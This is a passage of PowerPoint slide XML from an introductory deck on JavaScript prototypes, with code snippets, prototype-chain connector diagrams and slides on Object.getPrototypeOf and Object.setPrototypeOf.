                      <a:solidFill>
                        <a:srgbClr val="8A7B52"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>1</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1200" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="54" name="Connector: Curved 53">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{758BD32C-9DDC-EBEB-9BE7-0C96FDD643B4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="43" idx="3"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1527655" y="3722519"/>
                  <a:ext cx="1284330" cy="446173"/>
                </a:xfrm>
                <a:prstGeom prst="curvedConnector3">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F3AC981A-04F3-AA38-7EFE-BB7929CE1872}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="50263" y="3838658"/>
                <a:ext cx="5051646" cy="379113"/>
                <a:chOff x="48326" y="3866659"/>
                <a:chExt cx="5051646" cy="379113"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="51" name="TextBox 50">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD359AC-75B8-4834-8AC9-A57CA0E507FD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="48326" y="3898043"/>
                  <a:ext cx="1327053" cy="276999"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-HK" sz="1200" b="0" i="0" dirty="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="434F54"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>temp.b</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-HK" sz="1200" b="0" i="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="434F54"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t> === </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-HK" sz="1200" b="0" i="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="8A7B52"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>2</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1200" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="99" name="Group 98">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4666E23E-828D-ED04-5AE5-3681305C2D02}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="1375379" y="3866659"/>
                  <a:ext cx="3724593" cy="379113"/>
                  <a:chOff x="1375379" y="3866659"/>
                  <a:chExt cx="3724593" cy="379113"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="56" name="Connector: Curved 55">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2F21D62-05EC-8EBA-F212-9E7C75899F65}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:stCxn id="51" idx="3"/>
                    <a:endCxn id="47" idx="0"/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="1375379" y="3866659"/>
                    <a:ext cx="2383565" cy="169884"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedConnector4">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 46024"/>
                      <a:gd name="adj2" fmla="val 234562"/>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77CE479C-78BE-AB2A-D78F-A2124E7F2098}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:cxnSpLocks/>
                    <a:stCxn id="47" idx="0"/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm rot="16200000" flipH="1">
                    <a:off x="4239902" y="3385701"/>
                    <a:ext cx="379112" cy="1341029"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedConnector4">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val -60299"/>
                      <a:gd name="adj2" fmla="val 57068"/>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9BA9A6F9-D360-859E-7302-EA6705ABF497}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="192588" y="4028214"/>
                <a:ext cx="6946374" cy="385817"/>
                <a:chOff x="190651" y="4056215"/>
                <a:chExt cx="6946374" cy="385817"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="52" name="TextBox 51">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63520F93-9448-4A1F-859F-96A6A0633CC3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="190651" y="4165033"/>
                  <a:ext cx="1337003" cy="276999"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-HK" sz="1200" b="0" i="0" dirty="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="434F54"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>temp.c</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-HK" sz="1200" b="0" i="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="434F54"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t> === </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-HK" sz="1200" b="0" i="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="8A7B52"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>3</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1200" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="100" name="Group 99">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8604641D-D424-7FA9-A87F-B6E9F78A3091}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="1527654" y="4056215"/>
                  <a:ext cx="5609371" cy="300895"/>
                  <a:chOff x="1527654" y="4056215"/>
                  <a:chExt cx="5609371" cy="300895"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="61" name="Connector: Curved 60">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{724268CD-0B9F-3135-F7BC-E03605DDBA24}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:stCxn id="52" idx="3"/>
                    <a:endCxn id="47" idx="1"/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="1527654" y="4056215"/>
                    <a:ext cx="2041734" cy="247318"/>
                  </a:xfrm>
                  <a:prstGeom prst="curved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1EF206CE-8834-813E-CF21-F5109496418A}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:stCxn id="47" idx="3"/>
                    <a:endCxn id="48" idx="1"/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3948499" y="4056215"/>
                    <a:ext cx="1816387" cy="106126"/>
                  </a:xfrm>
                  <a:prstGeom prst="curved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Curved 71">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49BDACB6-2662-CEEF-7D83-B4445F5A4F7C}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:cxnSpLocks/>
                    <a:stCxn id="48" idx="3"/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="6143997" y="4162341"/>
                    <a:ext cx="993028" cy="194769"/>
                  </a:xfrm>
                  <a:prstGeom prst="curved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19" name="Group 118">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA1C84AB-2348-0B34-6974-9ED34D5E0646}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="130110" y="4217769"/>
                <a:ext cx="8614782" cy="834662"/>
                <a:chOff x="130110" y="4217769"/>
                <a:chExt cx="8614782" cy="834662"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="50" name="TextBox 49">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76615B49-A024-901D-2682-657A59980F1E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="130110" y="4439846"/>
                  <a:ext cx="2086539" cy="276999"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-HK" sz="1200" b="0" i="0" dirty="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="434F54"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>temp.d</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-HK" sz="1200" b="0" i="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="434F54"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t> === </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-HK" sz="1200" b="0" i="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="D35400"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>undefined</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1200" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="118" name="Group 117">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BF0556B-FF21-DD5B-9A8D-681DD2A224D4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="2216649" y="4217769"/>
                  <a:ext cx="6528243" cy="834662"/>
                  <a:chOff x="2216649" y="4217769"/>
                  <a:chExt cx="6528243" cy="834662"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="85" name="Connector: Curved 84">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7685FA11-2405-A45D-8B4F-0B936D3556F6}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:cxnSpLocks/>
                    <a:stCxn id="50" idx="3"/>
                    <a:endCxn id="47" idx="2"/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="2216649" y="4217769"/>
                    <a:ext cx="1544232" cy="360577"/>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Curved 86">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2590863D-2C5A-3ED1-352A-83C5CBCCDB13}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:cxnSpLocks/>
                    <a:stCxn id="47" idx="2"/>
                    <a:endCxn id="48" idx="2"/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm rot="16200000" flipH="1">
                    <a:off x="4805567" y="3173083"/>
                    <a:ext cx="106126" cy="2195498"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedConnector3">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 31540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AC0DEA68-36CE-7F30-124B-99748F0DBB5D}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:cxnSpLocks/>
                    <a:stCxn id="48" idx="2"/>
                    <a:endCxn id="49" idx="2"/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm rot="16200000" flipH="1">
                    <a:off x="6870783" y="3409491"/>
                    <a:ext cx="60490" cy="1889298"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedConnector3">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 47791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nector: Curved 90">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F84DBCC5-F34C-9177-9956-77C288DDC684}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:stCxn id="49" idx="2"/>
                    <a:endCxn id="14" idx="2"/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm rot="5400000" flipH="1" flipV="1">
                    <a:off x="8247206" y="3886700"/>
                    <a:ext cx="96156" cy="899214"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedConnector3">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val -23773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Curved 92">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DFF1341-BE4A-408B-72C3-0CA37589B6C8}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:cxnSpLocks/>
                    <a:stCxn id="14" idx="2"/>
                    <a:endCxn id="94" idx="3"/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm rot="5400000">
                    <a:off x="7874915" y="4000567"/>
                    <a:ext cx="582315" cy="115763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99C4F60A-EC0E-6502-652B-2BA2B1809CFA}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvSpPr txBox="1"/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="6434807" y="4744654"/>
                    <a:ext cx="1152446"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undefined</a:t>
                    </a:r>
                    <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344583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Prototype demonstration</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Using the same setup as the diagram in the previous slide</a:t>
            </a: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temp2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 b: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, c: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> },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temp1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 a: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, b: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> }, temp2)</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 a: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> }, temp1)</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temp.a</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</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temp.b</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</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temp.c</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3</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endParaRPr lang="en-US" altLang="zh-HK" sz="11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04293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Prototype 3</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*kicks the annoying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>Blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>(You might be able to infer it from the pervious slide…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The correct and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>modern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> way to get and set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9B8D8F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[[Prototype]]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> of an object is via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.getPrototypeOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [1] and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.setPrototypeOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [2] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pP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(temp)</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&lt;[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prototype]&gt; { a: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, b: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</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(temp,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 a: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</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(temp)</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temp.a</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</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temp.b</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b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>This ends this simple introduction to how prototypes work in a prototype-based language</a:t>
            </a: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5" name="TextBox 4">
            <a:extLst>
